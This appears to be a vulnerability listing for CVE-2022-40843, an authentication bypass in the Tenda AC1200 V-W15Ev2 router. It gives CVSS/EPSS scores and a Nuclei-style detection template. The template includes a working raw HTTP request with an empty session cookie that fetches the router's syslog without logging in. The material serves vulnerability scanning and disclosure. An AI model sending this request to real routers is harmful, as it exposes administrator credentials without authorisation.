4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
5.2 Medium
AI Score
Confidence
High
0.186 Low
EPSS
Percentile
96.3%
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
id: CVE-2022-40843
info:
name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
author: gy741
severity: medium
description: |
The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.
remediation: |
Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
reference:
- https://boschko.ca/tenda_ac1200_router
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2022-40843
cwe-id: CWE-287
epss-score: 0.37501
epss-percentile: 0.97193
cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: tenda
product: ac1200_v-w15ev2
tags: cve2022,cve,tenda,auth-bypass,router,iot
http:
- raw:
- |
GET /goform/downloadSyslog/syslog.log HTTP/1.1
Host: {{Hostname}}
Cookie: W15Ev2_user=
matchers-condition: and
matchers:
- type: regex
regex:
- '^0\d{3}$'
- type: word
part: body
words:
- "[system]"
- "[error]"
- "[wan1]"
condition: or
- type: word
part: header
words:
- "Content-type: config/conf"
- type: status
status:
- 200
# digest: 4a0a0047304502207422cca17346734af8803e05435d968ee607fb4d1020131202813e2275ce90fd022100d04e21dd1aeed78f39fe54ffd517fc0697342080ce5c9031dc72b12c2278db35:922c64590222798bb761d5b6d8e72950
4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
5.2 Medium
AI Score
Confidence
High
0.186 Low
EPSS
Percentile
96.3%